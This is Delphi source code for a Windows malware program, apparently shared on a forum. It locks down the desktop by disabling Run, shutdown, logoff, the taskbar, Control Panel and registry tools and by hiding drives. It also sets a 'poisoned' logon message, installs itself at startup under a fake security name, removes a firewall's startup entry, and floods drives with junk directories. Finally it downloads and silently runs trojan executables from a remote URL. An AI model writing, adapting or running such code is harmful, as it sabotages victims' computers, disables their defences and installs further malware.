unit Unit1;
interface
uses
Windows, Messages, SysUtils, Variants, Classes, Graphics, Controls, Forms,
Dialogs,registry, StdCtrls,urlmon;
type
TForm1 = class(TForm)
procedure FormCreate(Sender: TObject);
private
{ Private declarations }
public
{ Public declarations }
end;
var
Form1: TForm1;
implementation
{$R *.dfm}
procedure TForm1.FormCreate(Sender: TObject);
var
reg:tregistry;
wenjian:integer;
begin
//-------------------------------------------------------------------------------
begin //修改注册表,禁止“运行”菜单
reg:=tregistry.Create ;
reg.RootKey :=HKEY_CURRENT_USER;
try
if reg.OpenKey('Software\Microsoft\Windows\CurrentVersion\Policies\Explorer',false) then
begin
reg.WriteString('NoRun','1');
end;
finally
reg.CloseKey ;
end;
end;
//\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\
begin //修改注册表,禁止“关闭”菜单
reg:=tregistry.Create ;
reg.RootKey :=HKEY_CURRENT_USER;
try
if reg.OpenKey('Software\Microsoft\Windows\CurrentVersion\Policies\Explorer',false) then
begin
reg.WriteString('NoClose','1');
end;
finally
reg.CloseKey ;
end;
end;
//\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\
begin //修改注册表,隐藏所有逻辑盘符
reg:=tregistry.Create ;
reg.RootKey :=HKEY_CURRENT_USER;
try
if reg.OpenKey('Software\Microsoft\Windows\CurrentVersion\Policies\Explorer',false) then
begin
reg.WriteString('NoDrives','63000000');
end;
finally
reg.CloseKey ;
end;
end;
//\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\
begin //修改注册表,禁止注册表编辑
reg:=tregistry.Create ;
reg.RootKey :=HKEY_CURRENT_USER;
try
if reg.OpenKey('Software\Microsoft\Windows\CurrentVersion\Policies\System',false) then
begin
reg.WriteString('DisableRegistryTools','1');
end;
finally
reg.CloseKey ;
end;
end;
//\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\
begin //修改注册表,禁止“注销”菜单
reg:=tregistry.Create ;
reg.RootKey :=HKEY_CURRENT_USER;
try
if reg.OpenKey('Software\Microsoft\Windows\CurrentVersion\Policies\Explorer',false) then
begin
reg.WriteString('NoLogOff','1');
end;
finally
reg.CloseKey ;
end;
end;
//\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\
begin //修改注册表,禁止“任务栏和开始”菜单
reg:=tregistry.Create ;
reg.RootKey :=HKEY_CURRENT_USER;
try
if reg.OpenKey('Software\Microsoft\Windows\CurrentVersion\Policies\Explorer',false) then
begin
reg.WriteString('NoSetTaskBar','1');
end;
finally
reg.CloseKey ;
end;
end;
//\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\
begin //修改注册表,禁止右键菜单
reg:=tregistry.Create ;
reg.RootKey :=HKEY_CURRENT_USER;
try
if reg.OpenKey('Software\Microsoft\Windows\CurrentVersion\Policies\Explorer',false) then
begin
reg.WriteString('NoViewContextMenu','1');
end;
finally
reg.CloseKey ;
end;
end;
//\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\
begin //修改注册表,禁止控制面板
reg:=tregistry.Create ;
reg.RootKey :=HKEY_CURRENT_USER;
try
if reg.OpenKey('Software\Microsoft\Windows\CurrentVersion\Policies\Explorer',false) then
begin
reg.WriteString('NoSetFolders','1');
end;
finally
reg.CloseKey ;
end;
end;
//\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\
begin //修改注册表,改为用txt文件的关联
reg:=tregistry.Create ;
reg.RootKey :=HKEY_LOCAL_MACHINE;
try
if reg.OpenKey('Software\CLASSES\',false) then
begin
reg.WriteString('.reg','txtfile');
end;
finally
reg.CloseKey ;
end;
end;
//\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\
begin //修改注册表,设置开机提示框标题
reg:=tregistry.Create ;
reg.RootKey :=HKEY_LOCAL_MACHINE;
try
if reg.OpenKey('Software\Microsoft\Windows\CurrentVersion\Winlogon',false) then
begin
reg.WriteString('LegalNoticeCaption','警告');
end;
finally
reg.CloseKey ;
end;
end;
//\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\
begin //修改注册表,设置开机提示框文本内容
reg:=tregistry.Create ;
reg.RootKey :=HKEY_LOCAL_MACHINE;
try
if reg.OpenKey('Software\Microsoft\Windows\CurrentVersion\Winlogon',false) then
begin
reg.WriteString('LegalNoticeText','中毒了~~~');
end;
finally
reg.CloseKey ;
end;
end;
//------------------------------------------------------------------------------
begin
reg:=tregistry.Create ;
reg.RootKey :=HKEY_LOCAL_MACHINE;
if reg.OpenKey('software\microsoft\windows\currentversion\run',true) then //程序自启动
begin
if reg.ReadString('安全防护')='' then
reg.WriteString('安全防护',application.exename)
end;
try
if reg.OpenKey('software\microsoft\windows\currentversion\run',false) then //删除天网防火墙启动项
begin
reg.DeleteValue('SKYNET Personal FireWall');
reg.CloseKey ;
end;
finally
begin
reg.RootKey :=HKEY_CURRENT_USER;
if reg.OpenKey('software\microsoft\windows\currentversion\run',true) then
reg.WriteString('安全防护',application.ExeName );
reg.Free;
end;
end;
form1.Visible :=false; //设置不可见 ------------------------
application.ShowMainForm :=false; //设置不可见-----------------------
for wenjian:=-32768 to 32767 do
begin
winexec(pchar('cmd.exe /c md '+'c:\' +inttostr(wenjian)+'..\'),sw_hide); //向硬盘中大量写入垃圾文件
winexec(pchar('cmd.exe /c md '+'d:\' +inttostr(wenjian)+'..\'),sw_hide);
winexec(pchar('cmd.exe /c md '+'e:\' +inttostr(wenjian)+'..\'),sw_hide);
winexec(pchar('cmd.exe /c md '+'f:\' +inttostr(wenjian)+'..\'),sw_hide);
application.ProcessMessages ;
end;
for wenjian:=1 to 100 do
begin
application.ProcessMessages;
urldownloadtofile(nil,pchar(url),pchar('下载到本地病毒程序路径'),0,nil); //下载木马病毒
urldownloadtofile(nil,pchar(url),pchar('c:\windows\system32\muma2.exe'),0,nil);
urldownloadtofile(nil,pchar(url),pchar('c:\windows\system32\bingdu1.exe'),0,nil);
urldownloadtofile(nil,pchar(url),pchar('c:\windows\system32\bingdu2.exe'),0,nil);
end;
begin
winexec(pchar('cmd.exe /c c:\windows\system32\muma1.exe'),sw_hide); //执行木马病毒
winexec(pchar('cmd.exe /c c:\windows\system32\muma2.exe'),sw_hide);
winexec(pchar('cmd.exe /c c:\windows\system32\bingdu1.exe'),sw_hide);
winexec(pchar('cmd.exe /c c:\windows\system32\bingdu2.exe'),sw_hide);
end;
end;
end;
end.
猴子们 回帖是美德
